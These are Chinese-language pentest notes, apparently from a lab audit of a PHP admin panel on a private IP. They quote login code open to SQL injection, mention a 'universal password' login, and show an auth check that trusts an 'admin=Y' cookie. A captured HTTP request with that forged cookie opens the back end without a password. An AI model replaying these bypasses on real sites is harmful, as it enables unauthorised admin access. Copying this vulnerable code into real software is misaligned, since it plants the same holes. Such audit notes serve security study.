burp 抓包测试
单引号测试
login.php
参数未过滤 登录处存在SQL注入
使用万能密码
<?php
require '../config.php';
$adminname = $_POST['adminname'];
$adminpass = $_POST['adminpass'];
$adminsql = "select * from xwmi_admin where adminname='$adminname' and adminpass='$adminpass'";
$adminery = mysql_query($adminsql, $config);
$adminnum = mysql_num_rows($adminery);
if ($adminnum == "1") {
setcookie("admin", "Y", time() + 3600*24, '/');
setcookie("admin_name", $adminname, time() + 3600*24, '/');
header("location:admin.php");
} else {
header("location:index.php");
}
?>
http://192.168.5.8/dunling/admin/admin.php
==>
http://192.168.5.8/dunling/index.php
admin.php
<?php
require 'check.php';
require '../template/axadmin/head.php';
require '../template/axadmin/banner.php';
require '../template/axadmin/admin.php';
require '../template/axadmin/bottom.php'
?>
chack.php
判断cookie中 admin的值是否为空 不为空则登陆到后台 没有做用户验证
<?php
error_reporting(0);
isset($_COOKIE['admin'])?$check=$_COOKIE['admin']:$check=null;
isset($_COOKIE['admin_name'])?$admin_user=$_COOKIE['admin_name']:$user=null;
if($check != "Y" ){header("Location:../index.php");exit;}
?>抓包
GET /dunling/admin/admin.php HTTP/1.1
Host: 192.168.5.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 FS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin=Y; admin_name=ajie
Connection: close
cookie 加入信息 只要不为空 直接访问后台 无需密码。
